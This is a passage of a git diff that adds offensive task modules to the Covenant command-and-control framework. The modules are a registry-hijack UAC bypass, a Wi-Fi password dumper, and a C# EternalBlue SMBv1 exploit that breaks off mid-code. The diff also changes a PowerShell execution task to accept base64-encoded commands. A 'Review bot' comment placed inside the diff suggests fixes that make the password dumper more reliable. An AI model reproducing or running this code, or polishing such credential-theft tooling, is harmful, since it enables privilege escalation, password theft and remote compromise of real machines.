System.DirectoryServices.dll + Location: net40\System.DirectoryServices.dll + DotNetVersion: Net40 + - Name: System.Core.dll + Location: net40\System.Core.dll + DotNetVersion: Net40 + - Name: mscorlib.dll + Location: net40\mscorlib.dll + DotNetVersion: Net40 + - Name: System.Management.dll + Location: net35\System.Management.dll + DotNetVersion: Net35 + - Name: mscorlib.dll + Location: net35\mscorlib.dll + DotNetVersion: Net35 + - Name: System.Core.dll + Location: net35\System.Core.dll + DotNetVersion: Net35 + - Name: System.DirectoryServices.dll + Location: net35\System.DirectoryServices.dll + DotNetVersion: Net35 + - Name: System.dll + Location: net35\System.dll + DotNetVersion: Net35 + - Name: System.IdentityModel.dll + Location: net35\System.IdentityModel.dll + DotNetVersion: Net35 + EmbeddedResources: [] \ No newline at end of file diff --git a/Covenant/Data/Tasks/SharpSploit.Execution.yaml b/Covenant/Data/Tasks/SharpSploit.Execution.yaml index 7c27b05b..b9044a50 100644 --- a/Covenant/Data/Tasks/SharpSploit.Execution.yaml +++ b/Covenant/Data/Tasks/SharpSploit.Execution.yaml @@ -540,6 +540,7 @@ - Net40 Code: | using System; + using System.Text; using SharpSploit.Execution; @@ -549,11 +550,22 @@ { try { - return Shell.PowerShellExecute(PowerShellCommand, true); + try + { + byte[] ByteFromStr = Convert.FromBase64String(PowerShellCommand); + PowerShellCommand = Encoding.Unicode.GetString(ByteFromStr); + return Shell.PowerShellExecute(PowerShellCommand); + } + catch(Exception e) + { + return Shell.PowerShellExecute(PowerShellCommand, true); + } + } catch (Exception e) { return e.GetType().FullName + ": " + e.Message + Environment.NewLine + e.StackTrace; } } } + TaskingType: Assembly UnsafeCompile: false TokenTask: false diff --git a/Covenant/Data/Tasks/UAC_reg_bypass.yaml b/Covenant/Data/Tasks/UAC_reg_bypass.yaml new file mode 100644 index 00000000..b4867c7f --- /dev/null +++ b/Covenant/Data/Tasks/UAC_reg_bypass.yaml 
@@ -0,0 +1,145 @@ +- Name: UAC_reg_bypass + Aliases: [] + Description: uac bypass with eventvwr or fodhelper + Author: + Name: amine brahmi + Handle: khraoverflow + Link: https://twitter.com/dr_whoami_ + Help: + Language: CSharp + CompatibleDotNetVersions: + - Net35 + - Net40 + Code: | + using System; + using Microsoft.Win32; + using System.Threading; + using System.Diagnostics; + + public static class Task + { + public static string Execute(string registryKey, string command) + { + try + { + RegistryKey alwaysNotify = Registry.LocalMachine.OpenSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"); + string consentPrompt = alwaysNotify.GetValue("ConsentPromptBehaviorAdmin").ToString(); + string secureDesktopPrompt = alwaysNotify.GetValue("PromptOnSecureDesktop").ToString(); + alwaysNotify.Close(); + + if (consentPrompt == "2" & secureDesktopPrompt == "1") + { + return "UAC is set to Always Notify. Not performing UAC bypass."; + } + } + catch (Exception e) { return e.GetType().FullName + ": " + e.Message + Environment.NewLine + e.StackTrace; } + + if (registryKey.ToLower() == "fodhelper") + { + try + { + RegistryKey newkey = Registry.CurrentUser.OpenSubKey(@"Software\Classes\", true); + newkey.CreateSubKey(@"ms-settings\Shell\Open\command"); + + RegistryKey fod = Registry.CurrentUser.OpenSubKey(@"Software\Classes\ms-settings\Shell\Open\command", true); + fod.SetValue("DelegateExecute", ""); + fod.SetValue("", command); + fod.Close(); + + Process p = new Process(); + p.StartInfo.WindowStyle = ProcessWindowStyle.Hidden; + p.StartInfo.FileName = "C:\\windows\\system32\\fodhelper.exe"; + p.Start(); + + Thread.Sleep(10000); + + newkey.DeleteSubKeyTree("ms-settings"); + return "Fodhelper UAC bypass executed"; + } + catch (Exception e) { return e.GetType().FullName + ": " + e.Message + Environment.NewLine + e.StackTrace; } + } + else if (registryKey.ToLower() == "eventvwr") + { + try + { + RegistryKey newkey = 
Registry.CurrentUser.OpenSubKey(@"Software\Classes\", true); + newkey.CreateSubKey(@"mscfile\Shell\Open\command"); + + RegistryKey vwr = Registry.CurrentUser.OpenSubKey(@"Software\Classes\mscfile\Shell\Open\command", true); + vwr.SetValue("", command); + vwr.Close(); + + Process p = new Process(); + p.StartInfo.WindowStyle = ProcessWindowStyle.Hidden; + p.StartInfo.FileName = "C:\\windows\\system32\\eventvwr.exe"; + p.Start(); + + Thread.Sleep(10000); + + newkey.DeleteSubKeyTree("mscfile"); + return "Eventvwr UAC bypass executed."; + } + catch (Exception e) { return e.GetType().FullName + ": " + e.Message + Environment.NewLine + e.StackTrace; } + } + else + { + return "Invalid bypass selected. Select either 'fodhelper' or 'eventvwr.'"; + } + } + } + TaskingType: Assembly + UnsafeCompile: false + TokenTask: false + Options: + - Name: registryKey + Value: '' + DefaultValue: 'fodhelper' + Description: use fodhelper or eventvwr + SuggestedValues: + - fodhelper + - eventvwr + Optional: true + DisplayInCommand: true + FileOption: false + - Name: command + Value: '' + DefaultValue: '' + Description: command to execute . 
+ SuggestedValues: [] + Optional: false + DisplayInCommand: true + FileOption: false + ReferenceSourceLibraries: [] + ReferenceAssemblies: + - Name: System.Drawing.dll + Location: net40\System.Drawing.dll + DotNetVersion: Net40 + - Name: System.dll + Location: net40\System.dll + DotNetVersion: Net40 + - Name: System.Core.dll + Location: net40\System.Core.dll + DotNetVersion: Net40 + - Name: mscorlib.dll + Location: net40\mscorlib.dll + DotNetVersion: Net40 + - Name: System.Windows.Forms.dll + Location: net40\System.Windows.Forms.dll + DotNetVersion: Net40 + - Name: mscorlib.dll + Location: net35\mscorlib.dll + DotNetVersion: Net35 + - Name: System.Core.dll + Location: net35\System.Core.dll + DotNetVersion: Net35 + - Name: System.dll + Location: net35\System.dll + DotNetVersion: Net35 + - Name: System.Drawing.dll + Location: net35\System.Drawing.dll + DotNetVersion: Net35 + - Name: System.Windows.Forms.dll + Location: net35\System.Windows.Forms.dll + DotNetVersion: Net35 + EmbeddedResources: [] + diff --git a/Covenant/Data/Tasks/Wifi_password.yaml b/Covenant/Data/Tasks/Wifi_password.yaml new file mode 100644 index 00000000..3b1c9396 --- /dev/null +++ b/Covenant/Data/Tasks/Wifi_password.yaml 
@@ -0,0 +1,174 @@ +- Name: Wifi_passwords + Aliases: [] + Description: get wifis passwords + Author: + Name: amine brahmi + Handle: khraoverflow + Link: https://twitter.com/dr_whoami_ + Help: + Language: CSharp + CompatibleDotNetVersions: + - Net35 + - Net40 + Code: | + using System; + using System.IO; + using System.Text; + using System.Windows.Forms; + + using System.Collections.Generic; + using System.Diagnostics; + using System.Globalization; + + public static class Task + { + public static string Execute() + { + string output = " SSID PASSWORD"; + output += Environment.NewLine; + output += "-------------------- -------------------------" + Environment.NewLine; + CultureInfo ci = CultureInfo.InstalledUICulture; + + try + { + List wifis = new List(); + + var proc = new Process + { + StartInfo = new ProcessStartInfo + { + FileName = "netsh.exe", + Arguments = "wlan show profiles", + UseShellExecute = false, + RedirectStandardOutput = true, + CreateNoWindow = true + } + }; + + + + + proc.Start(); + + while (!proc.StandardOutput.EndOfStream) + { + string line = proc.StandardOutput.ReadLine(); + try + { + string separator = ""; + + separator = ci.Name.Contains("fr") ? "Profil Tous les utilisateurs" : "All User Profile"; + + if (line.Contains(separator)) + { + string name = line.Substring(2 + line.IndexOf(": "), line.Length - line.IndexOf(": ") - 2); + if (name.Length > 1) + wifis.Add(name); + } + + } + catch (Exception) + { + + } + + // do something with line + } + + foreach (string wifi in wifis) + { + + var proc2 = new Process + { + StartInfo = new ProcessStartInfo + { + FileName = "netsh.exe", + Arguments = string.Format(@"wlan show profiles name=""{0}"" key=clear",wifi), + UseShellExecute = false, + RedirectStandardOutput = true, + CreateNoWindow = true + } + }; + + + + + proc2.Start(); + + while (!proc2.StandardOutput.EndOfStream) + { + string line = proc2.StandardOutput.ReadLine(); + try + { + string separator = ""; + + separator = ci.Name.Contains("fr") ? 
"clé" : "key Content"; + + if (line.IndexOf(separator) != -1 ) + { + string pass = line.Substring(2 + line.IndexOf(": "), line.Length - line.IndexOf(": ") - 2); + + output += wifi + string.Empty.PadLeft(26-wifi.Length,' ') + pass + Environment.NewLine; + output += "=================================================" + Environment.NewLine; + } + + + + } + catch (Exception) + { + + } + + // do something with line + } + } + return output; + + } + catch (Exception e) + { + + return e.Message; + } + } + + } + TaskingType: Assembly + UnsafeCompile: false + TokenTask: false + Options: [] + ReferenceSourceLibraries: [] + ReferenceAssemblies: + - Name: System.Drawing.dll + Location: net40\System.Drawing.dll + DotNetVersion: Net40 + - Name: System.dll + Location: net40\System.dll + DotNetVersion: Net40 + - Name: System.Core.dll + Location: net40\System.Core.dll + DotNetVersion: Net40 + - Name: mscorlib.dll + Location: net40\mscorlib.dll + DotNetVersion: Net40 + - Name: System.Windows.Forms.dll + Location: net40\System.Windows.Forms.dll + DotNetVersion: Net40 + - Name: mscorlib.dll + Location: net35\mscorlib.dll + DotNetVersion: Net35 + - Name: System.Core.dll + Location: net35\System.Core.dll + DotNetVersion: Net35 + - Name: System.dll + Location: net35\System.dll + DotNetVersion: Net35 + - Name: System.Drawing.dll + Location: net35\System.Drawing.dll + DotNetVersion: Net35 + - Name: System.Windows.Forms.dll + Location: net35\System.Windows.Forms.dll + DotNetVersion: Net35 + EmbeddedResources: [] + diff --git a/Covenant/Data/Tasks/eternalblue.yaml b/Covenant/Data/Tasks/eternalblue.yaml new file mode 100644 index 00000000..5fee629b --- /dev/null +++ b/Covenant/Data/Tasks/eternalblue.yaml 
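Review bot: The password line in the second netsh loop, `output += wifi + string.Empty.PadLeft(26-wifi.Length,' ') + pass + Environment.NewLine;`, throws ArgumentOutOfRangeException for any SSID longer than 26 characters, and the enclosing `catch (Exception) { }` swallows it, so those profiles are silently missing from the report. `output += wifi.PadRight(26) + pass + Environment.NewLine;` yields the same layout without the exception, and the empty catch blocks should at least append the exception message to `output` so a dropped entry is visible to the operator. The profile name is also spliced into the netsh command line as `name=""{0}""` with no escaping, so a profile name containing a double quote produces a malformed argument; since the name comes from netsh's own output rather than a remote party this is a correctness issue rather than an injection one, but it still deserves a comment. The locale check `ci.Name.Contains("fr")` only matches the English and French netsh strings, so on any other UI language the task returns just the header with no indication that nothing matched; either state that limitation in `Description` or emit a line such as `"no profiles matched (unsupported netsh locale " + ci.Name + ")"` when `wifis` stays empty.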
@@ -0,0 +1,1171 @@ +- Name: eternalblue + Aliases: [] + Description: eternalblue x64 only for now + Author: + Name: amine brahmi + Handle: khraoverflow + Link: https://twitter.com/dr_whoami_ + Help: + Language: CSharp + CompatibleDotNetVersions: + - Net35 + - Net40 + Code: | + using System; + using System.Collections.Generic; + using System.Linq; + using System.Net; + using System.Net.Sockets; + using System.Runtime.InteropServices; + using System.Text; + + class Task + { + public static string output=""; + + [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Ansi, Pack = 1)] + public struct NETBIOS_HEADER + { + public uint MessageTypeAndSize; + } + + [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Ansi, Pack = 1)] + public struct SMB_HEADER + { + public uint protocol; + public byte command; + public byte errorClass; + public byte _reserved; + public ushort errorCode; + public byte flags; + public ushort flags2; + public ushort PIDHigh; + public ulong SecurityFeatures; + public ushort reserved; + public ushort TID; + public ushort PIDLow; + public ushort UID; + public ushort MID; + } + + [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Ansi, Pack = 1)] + public struct SMB_COM_SESSION_SETUP_ANDX_RESPONSE + { + public byte WordCount; + public byte AndxCommand; + public byte reserved; + public ushort AndxOffset; + public ushort action; + public ushort ByteCount; + } + + [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Ansi, Pack = 1)] + public struct SMB_COM_SESSION_SETUP_ANDX_REQUEST + { + public byte WordCount; + public byte AndxCommand; + public byte reserved1; + public ushort AndxOffset; + public ushort MaxBuffer; + public ushort MaxMpxCount; + public ushort VcNumber; + public uint SessionKey; + public ushort OEMPasswordLen; + public ushort UnicodePasswordLen; + public uint Reserved2; + public uint Capabilities; + public ushort ByteCount; + //SMB Data added manually + } + + [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Ansi, Pack = 
1)] + public struct SMB_COM_NEGOTIATE_REQUEST + { + public byte WordCount; + public ushort ByteCount; + //Dialects are added manually + } + [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Ansi, Pack = 1)] + public struct SMB_COM_TRANSACTION_REQUEST + { + public byte WordCount; + public ushort TotalParameterCount; + public ushort TotalDataCount; + public ushort MaxParameterCount; + public ushort MaxDataCount; + public byte MaxSetupCount; + public byte Reserved; + public ushort Flags; + public uint Timeout; + public ushort Reserved2; + public ushort ParameterCount; + public ushort ParameterOffset; + public ushort DataCount; + public ushort DataOffset; + public byte SetupCount; + public byte Reserved3; + public ushort Function; + public ushort FID; + public ushort ByteCount; + //TransactionName added manually + } + + [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Ansi, Pack = 1)] + public struct SMB_COM_TREE_CONNECT_ANDX_REQUEST + { + public byte WordCount; + public byte AndXCommand; + public byte AndXReserved; + public ushort AndXOffset; + public ushort Flags; + public ushort PasswordLength; + public ushort ByteCount; + //SMBData added manually + } + + [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Ansi, Pack = 1)] + public struct SMB_COM_ECHO_REQUEST + { + public byte WordCount; + public ushort EchoSequenceNumber; + public ushort ByteCount; + //SMBData added manually + } + + + [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Ansi, Pack = 1)] + public struct SMB_COM_NT_TRANSACT_REQUEST + { + public byte WordCount; + public byte MaxSetupCount; + public ushort Reserved; + public uint TotalParameterCount; + public uint TotalDataCount; + public uint MaxParameterCount; + public uint MaxDataCount; + public uint ParameterCount; + public uint ParameterOffset; + public uint DataCount; + public uint DataOffset; + public byte SetupCount; + public ushort Function; + public ushort Setup; + public ushort ByteCount; + //SMBData added manually + } + 
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Ansi, Pack = 1)] + public struct SMB_COM_TRANSACTION2_SECONDARY_REQUEST + { + public byte WordCount; + public ushort TotalParameterCount; + public ushort TotalDataCount; + public ushort ParameterCount; + public ushort ParameterOffset; + public ushort ParameterDisplacement; + public ushort DataCout; + public ushort DataOffset; + public ushort DataDisplacement; + public ushort FID; + public ushort ByteCount; + //SMBData added manually + } + + static public SMB_COM_NEGOTIATE_REQUEST SMB_COMNegotiateRequestFromBytes(byte[] arr) + { + SMB_COM_NEGOTIATE_REQUEST str = new SMB_COM_NEGOTIATE_REQUEST(); + int size = Marshal.SizeOf(str); + IntPtr ptr = Marshal.AllocHGlobal(size); + Marshal.Copy(arr, 0, ptr, size); + str = (SMB_COM_NEGOTIATE_REQUEST)Marshal.PtrToStructure(ptr, str.GetType()); + Marshal.FreeHGlobal(ptr); + return str; + } + + + static public byte[] SetNetBiosHeader(byte[] pkt) + { + uint size = (uint)pkt.Length; + byte[] intBytes = BitConverter.GetBytes(size).Reverse().ToArray(); + NETBIOS_HEADER netbios_header = new NETBIOS_HEADER(); + netbios_header.MessageTypeAndSize = BitConverter.ToUInt32(intBytes, 0); + byte[] netbios_header_packet = GetBytes(netbios_header); + byte[] fullMessage = netbios_header_packet.Concat(pkt).ToArray(); + return fullMessage; + } + + static public void SendSMBMessage(Socket sock, byte[] pkt, bool SetHeader) + { + //Calculate and set Message Length for NetBios Header + if (SetHeader) + { + pkt = SetNetBiosHeader(pkt); + } + try + { + sock.Send(pkt); + } + catch (Exception e) + { + output += Environment.NewLine +"Socket Error, during sending: " + e.Message; + } + } + + static public byte[] ReceiveSMBMessage(Socket sock) + { + byte[] response = new byte[1024]; + try + { + sock.Receive(response); + } + catch (Exception e) + { + output += Environment.NewLine +"Socket Error, during receive: " + e.Message; + } + return response.Skip(4).ToArray(); + } + + static public byte[] 
GetBytes(object str) + { + int size = Marshal.SizeOf(str); + + byte[] arr = new byte[size]; + IntPtr ptr = Marshal.AllocHGlobal(size); + Marshal.StructureToPtr(str, ptr, true); + Marshal.Copy(ptr, arr, 0, size); + Marshal.FreeHGlobal(ptr); + return arr; + } + + static public SMB_COM_SESSION_SETUP_ANDX_RESPONSE SMB_AndxResponseFromBytes(byte[] arr) + { + SMB_COM_SESSION_SETUP_ANDX_RESPONSE str = new SMB_COM_SESSION_SETUP_ANDX_RESPONSE(); + int size = Marshal.SizeOf(str); + IntPtr ptr = Marshal.AllocHGlobal(size); + Marshal.Copy(arr, 0, ptr, size); + str = (SMB_COM_SESSION_SETUP_ANDX_RESPONSE)Marshal.PtrToStructure(ptr, str.GetType()); + Marshal.FreeHGlobal(ptr); + return str; + } + + static public SMB_HEADER SMB_HeaderFromBytes(byte[] arr) + { + SMB_HEADER str = new SMB_HEADER(); + int size = Marshal.SizeOf(str); + IntPtr ptr = Marshal.AllocHGlobal(size); + Marshal.Copy(arr, 0, ptr, size); + str = (SMB_HEADER)Marshal.PtrToStructure(ptr, str.GetType()); + Marshal.FreeHGlobal(ptr); + return str; + } + static public bool IsValidSMB1Header(SMB_HEADER header) + { + if (header.protocol == 0x424d53ff) + { + return true; + } + return false; + } + + static public void DetectVersionOfWindows(byte[] res) + { + SMB_HEADER header = SMB_HeaderFromBytes(res); + if (!IsValidSMB1Header(header)) + { + output += Environment.NewLine +"Did not receive proper response when determining version... 
Are you sure this server is running SMB?"; + return; + } + int sizeOfHeader = Marshal.SizeOf(header); + SMB_COM_SESSION_SETUP_ANDX_RESPONSE andxr = SMB_AndxResponseFromBytes(res.Skip(sizeOfHeader).ToArray()); + int byteCount = andxr.ByteCount; + int sizeOfAndxr = Marshal.SizeOf(andxr); + byte[] data = res.Skip(sizeOfHeader + sizeOfAndxr + 1).ToArray().Take(byteCount).ToArray(); //The 1 is for Padding- This could become a problem + string hexString = BitConverter.ToString(data).Replace("-00-00-00-", "&"); //The SMB data is split using 3 0x00 bytes, these are changed to an '&' for easier split + string[] hexStringSplit = hexString.Split('&'); + + for (int i = 0; i < 3; i++) + { + StringBuilder strbuilder = new StringBuilder(); + string[] charArray = hexStringSplit[i].Split('-'); + foreach (string chars in charArray) + { + int value = Convert.ToInt32(chars, 16); + char charValue = (char)value; + if (charValue != 0) + { + strbuilder.Append(charValue); + } + } + if (i == 0) + { + output += Environment.NewLine +"Native OS: " + strbuilder.ToString(); + } + else if (i == 1) + { + output += Environment.NewLine +"Native LAN Manager: " + strbuilder.ToString(); + } + else if (i == 2) + { + output += Environment.NewLine +"Domain: " + strbuilder.ToString(); + } + } + } + + static public bool CheckVulnerability(Socket sock) + { + bool vulnerable = false; + SMB_HEADER header = new SMB_HEADER + { + protocol = 0x424d53ff, + command = 0x25, + errorClass = 0x00, + _reserved = 0x00, + errorCode = 0x0000, + flags = 0x18, + flags2 = 0x2801, + PIDHigh = 0x0000, + SecurityFeatures = 0x0000000000000000, + reserved = 0x0000, + TID = 0x0800, + PIDLow = 0x5604, + UID = 0x0800, + MID = 0x8624 + }; + byte[] headerBytes = GetBytes(header); + + SMB_COM_TRANSACTION_REQUEST transRequest = new SMB_COM_TRANSACTION_REQUEST + { + WordCount = 0x10, + TotalParameterCount = 0x0000, + TotalDataCount = 0x0000, + MaxParameterCount = 0xffff, + MaxDataCount = 0xffff, + MaxSetupCount = 0x00, + Reserved = 0x00, + 
Flags = 0x0000, + Timeout = 0x00000000, + Reserved2 = 0x0000, + ParameterCount = 0x0000, + ParameterOffset = 0x004a, + DataCount = 0x0000, + DataOffset = 0x004a, + SetupCount = 0x02, + Reserved3 = 0x00, + Function = 0x0023, + FID = 0x0000 + }; + byte[] transactionName = Encoding.UTF8.GetBytes("\\PIPE\\\0"); + transRequest.ByteCount = (ushort)transactionName.Length; + + byte[] transRequestBytes = GetBytes(transRequest).Concat(transactionName).ToArray(); + byte[] pkt = headerBytes.Concat(transRequestBytes).ToArray(); + SendSMBMessage(sock, pkt, true); + + header = SMB_HeaderFromBytes(ReceiveSMBMessage(sock)); + if (header.errorClass == 0x05 && header._reserved == 0x02 && header.errorCode == 0xc000) //This equals STATUS_INSUFF_SERVER_RESOURCES + { + return true; + } + return vulnerable; + } + + static public byte[] ClientNegotiate(Socket sock) + { + SMB_HEADER header = new SMB_HEADER + { + protocol = 0x424d53ff, + command = 0x72, + errorClass = 0x00, + _reserved = 0x00, + errorCode = 0x0000, + flags = 0x18, + flags2 = 0x2801, + PIDHigh = 0x0000, + SecurityFeatures = 0x0000000000000000, + reserved = 0x0000, + TID = 0x0000, + PIDLow = 0x4b2f, + UID = 0x0000, + MID = 0x5ec5 + }; + byte[] headerBytes = GetBytes(header); + + SMB_COM_NEGOTIATE_REQUEST req = new SMB_COM_NEGOTIATE_REQUEST + { + WordCount = 0x00 + }; + List dialects = new List(); + dialects.AddRange(Encoding.UTF8.GetBytes("\x2LANMAN1.0\0")); + dialects.AddRange(Encoding.UTF8.GetBytes("\x2LM1.2X002\0")); + dialects.AddRange(Encoding.UTF8.GetBytes("\x2NT LANMAN 1.0\0")); + dialects.AddRange(Encoding.UTF8.GetBytes("\x2NT LM 0.12\0")); + req.ByteCount = (ushort)dialects.Count; + + byte[] negotitateRequest = GetBytes(req).Concat(dialects.ToArray()).ToArray(); + string hex = BitConverter.ToString(negotitateRequest); + byte[] pkt = headerBytes.Concat(negotitateRequest).ToArray(); + SendSMBMessage(sock, pkt, true); + return ReceiveSMBMessage(sock); + } + + public static string ByteArrayToString(byte[] ba) + { + 
StringBuilder hex = new StringBuilder(ba.Length * 2); + foreach (byte b in ba) + hex.AppendFormat("{0:x2}-", b); + return hex.ToString(); + } + + static public byte[] SMB1AnonymousLogin(Socket sock) + { + + SMB_HEADER header = new SMB_HEADER + { + protocol = 0x424d53ff, + command = 0x73, + errorClass = 0x00, + _reserved = 0x00, + errorCode = 0x0000, + flags = 0x18, + flags2 = 0xc007, + PIDHigh = 0x0000, + SecurityFeatures = 0x0000000000000000, + reserved = 0x0000, + TID = 0xfeff, + PIDLow = 0x0000, + UID = 0x0000, + MID = 0x0040 + }; + byte[] headerBytes = GetBytes(header); + + SMB_COM_SESSION_SETUP_ANDX_REQUEST AndxRequest = new SMB_COM_SESSION_SETUP_ANDX_REQUEST + { + WordCount = 0x0d, + AndxCommand = 0xff, + reserved1 = 0x00, + AndxOffset = 0x0088, + MaxBuffer = 0x1104, + MaxMpxCount = 0x00a0, + VcNumber = 0x0000, + SessionKey = 0x00000000, + OEMPasswordLen = 0x0001, + UnicodePasswordLen = 0x0000, + Reserved2 = 0x00000000, + Capabilities = 0x000000d4 + }; + List SMBData = new List(); + byte[] nulls = { 0x00, 0x00, 0x00, 0x00, 0x00 }; + SMBData.AddRange(nulls); + SMBData.AddRange(Encoding.UTF8.GetBytes("W\0i\0n\0d\0o\0w\0s\0 \02\00\00\00\0 \02\01\09\05\0\0\0")); + SMBData.AddRange(Encoding.UTF8.GetBytes("W\0i\0n\0d\0o\0w\0s\0 \02\00\00\00\0 \05\0.\00\0\0\0")); + AndxRequest.ByteCount = (ushort)SMBData.Count; + + byte[] AndxRequestBytes = GetBytes(AndxRequest).Concat(SMBData.ToArray()).ToArray(); + byte[] pkt = headerBytes.Concat(AndxRequestBytes).ToArray(); + SendSMBMessage(sock, pkt, true); + return ReceiveSMBMessage(sock); + } + + static public byte[] TreeConnectAndXRequest(string target, Socket sock, ushort UID) + { + SMB_HEADER header = new SMB_HEADER + { + protocol = 0x424d53ff, + command = 0x75, + errorClass = 0x00, + _reserved = 0x00, + errorCode = 0x0000, + flags = 0x18, + flags2 = 0x2001, + PIDHigh = 0x0000, + SecurityFeatures = 0x0000000000000000, + reserved = 0x0000, + TID = 0xfeff, + PIDLow = 0x4b2f, + UID = UID, + MID = 0x5ec5 + }; + byte[] 
headerBytes = GetBytes(header); + + SMB_COM_TREE_CONNECT_ANDX_REQUEST treeConnectAndxRequest = new SMB_COM_TREE_CONNECT_ANDX_REQUEST + { + WordCount = 0x04, + AndXCommand = 0xff, + AndXReserved = 0x00, + AndXOffset = 0x0000, + Flags = 0x0000, + PasswordLength = 0x0001, + }; + byte[] PathServiceBytes = Encoding.ASCII.GetBytes(@"\\" + target + @"\IPC$" + "\0?????\0"); + List SMBData = new List(); + SMBData.Add(0x00); //Password + SMBData.AddRange(PathServiceBytes); //Path + Service + treeConnectAndxRequest.ByteCount = (ushort)SMBData.Count; + + byte[] TreeConnectAndxRequestBytes = GetBytes(treeConnectAndxRequest).Concat(SMBData.ToArray()).ToArray(); + byte[] pkt = headerBytes.Concat(TreeConnectAndxRequestBytes).ToArray(); + + SendSMBMessage(sock, pkt, true); + return ReceiveSMBMessage(sock); + } + + static public byte[] MakeSMB1NTTransPacket(ushort TID, ushort UID) + { + SMB_HEADER header = new SMB_HEADER + { + protocol = 0x424d53ff, + command = 0xa0, + errorClass = 0x00, + _reserved = 0x00, + errorCode = 0x0000, + flags = 0x18, + flags2 = 0xc007, + PIDHigh = 0x0000, + SecurityFeatures = 0x0000000000000000, + reserved = 0x0000, + TID = TID, + PIDLow = 0xfeff, + UID = UID, + MID = 0x0040 + }; + byte[] headerBytes = GetBytes(header); + + SMB_COM_NT_TRANSACT_REQUEST NTtransactionRequest = new SMB_COM_NT_TRANSACT_REQUEST + { + WordCount = 0x14, + MaxSetupCount = 0x01, + Reserved = 0x0000, + TotalParameterCount = 0x0000001e, + TotalDataCount = 0x000103d0, + MaxParameterCount = 0x0000001e, + MaxDataCount = 0x00000000, + ParameterCount = 0x0000001e, + ParameterOffset = 0x0000004b, + DataCount = 0x000003d0, + DataOffset = 0x00000068, + SetupCount = 0x01, + Function = 0x0000, + Setup = 0x0000 + }; + //Add SMBData + List SMBData = new List(); + SMBData.AddRange(Enumerable.Repeat((byte)0x00, 31)); + SMBData.Add(0x01); + SMBData.AddRange(Enumerable.Repeat((byte)0x00, 973)); + NTtransactionRequest.ByteCount = (ushort)(SMBData.Count - 1); + //Merge SMBHeader with the 
NTTransactionRequest + byte[] NTtransactionRequestBytes = GetBytes(NTtransactionRequest).Concat(SMBData.ToArray()).ToArray(); + byte[] pkt = headerBytes.Concat(NTtransactionRequestBytes).ToArray(); + return pkt; + } + + + static public byte[] MakeSMB1Trans2ExploitPacket(ushort TID, ushort UID, string type, int time) + { + + NETBIOS_HEADER NTHeader = new NETBIOS_HEADER + { + MessageTypeAndSize = 0x35100000 + }; + + SMB_HEADER header = new SMB_HEADER + { + protocol = 0x424d53ff, + command = 0x33, + errorClass = 0x00, + _reserved = 0x00, + errorCode = 0x0000, + flags = 0x18, + flags2 = 0xc007, + PIDHigh = 0x0000, + SecurityFeatures = 0x0000000000000000, + reserved = 0x0000, + TID = TID, + PIDLow = 0xfeff, + UID = UID, + MID = 0x0040 + }; + byte[] headerBytes = GetBytes(NTHeader).Concat(GetBytes(header)).ToArray(); + + SMB_COM_TRANSACTION2_SECONDARY_REQUEST transaction2SecondaryRequest = new SMB_COM_TRANSACTION2_SECONDARY_REQUEST + { + WordCount = 0x09, + TotalParameterCount = 0x0102, + TotalDataCount = 0x1000, + ParameterCount = 0x0000, + ParameterOffset = 0x0000, + ParameterDisplacement = 0x0000, + DataCout = 0x1000, + DataOffset = 0x0035, + DataDisplacement = 0x0000, //we change this with our timeout int later + FID = 0x0000, + ByteCount = 0x1000 + }; + int timeout = (time * 16) + 3; + transaction2SecondaryRequest.DataDisplacement = BitConverter.ToUInt16(new byte[] { 0xd0, BitConverter.GetBytes(timeout)[0] }, 0); + //Merge SMBHeader with the transaction2SecondaryRequest + byte[] transaction2SecondaryRequestBytes = GetBytes(transaction2SecondaryRequest); + byte[] pkt = headerBytes.Concat(transaction2SecondaryRequestBytes).ToArray(); + + if (type.Equals("eb_trans2_exploit")) + { + List SMBData = new List(); + + SMBData.AddRange(Enumerable.Repeat((byte)0x00, 2957)); + SMBData.AddRange(new List() + { + 0x80,0x00,0xa8,0x00 + }); + SMBData.AddRange(Enumerable.Repeat((byte)0x00, 16)); + SMBData.AddRange(new List() + { + 0xff,0xff + }); + 
SMBData.AddRange(Enumerable.Repeat((byte)0x00, 6)); + SMBData.AddRange(new List() + { + 0xff,0xff + }); + SMBData.AddRange(Enumerable.Repeat((byte)0x00, 22)); + SMBData.AddRange(new List() + { + 0x00,0xf1,0xdf,0xff // x86 addresses + }); + SMBData.AddRange(Enumerable.Repeat((byte)0x00, 8)); + SMBData.AddRange(new List() + { + 0x20,0xf0,0xdf,0xff,0x00,0xf1,0xdf,0xff,0xff,0xff,0xff,0xff,0x60,0x00,0x04,0x10 + }); + SMBData.AddRange(Enumerable.Repeat((byte)0x00, 4)); + SMBData.AddRange(new List() + { + 0x80,0xef,0xdf,0xff + }); + SMBData.AddRange(Enumerable.Repeat((byte)0x00, 4)); + SMBData.AddRange(new List() + { + 0x10,0x00,0xd0,0xff,0xff,0xff,0xff,0xff,0x18,0x01,0xd0,0xff,0xff,0xff,0xff,0xff + }); + SMBData.AddRange(Enumerable.Repeat((byte)0x00, 0x10)); + SMBData.AddRange(new List() + { + 0x60,0x00,0x04,0x10 + }); + SMBData.AddRange(Enumerable.Repeat((byte)0x00, 0xc)); + SMBData.AddRange(new List() + { + 0x90,0xff,0xcf,0xff,0xff,0xff,0xff,0xff + }); + SMBData.AddRange(Enumerable.Repeat((byte)0x00, 0x8)); + SMBData.AddRange(new List() + { + 0x80,0x10 + }); + SMBData.AddRange(Enumerable.Repeat((byte)0x00, 0xe)); + SMBData.AddRange(new List() + { + 0x39,0xbb + }); + SMBData.AddRange(Enumerable.Repeat((byte)0x41, 965)); + pkt = pkt.Concat(SMBData.ToArray()).ToArray(); + return pkt; + } + + if (type.Equals("eb_trans2_zero")) + { + List SMBData = new List(); + SMBData.AddRange(Enumerable.Repeat((byte)0x00, 2055)); + SMBData.Add(0x83); + SMBData.Add(0xf3); + SMBData.AddRange(Enumerable.Repeat((byte)0x41, 2039)); + pkt = pkt.Concat(SMBData.ToArray()).ToArray(); //Collect it all + return pkt; + } + else + { + List SMBData = new List(); + SMBData.AddRange(Enumerable.Repeat((byte)0x41, 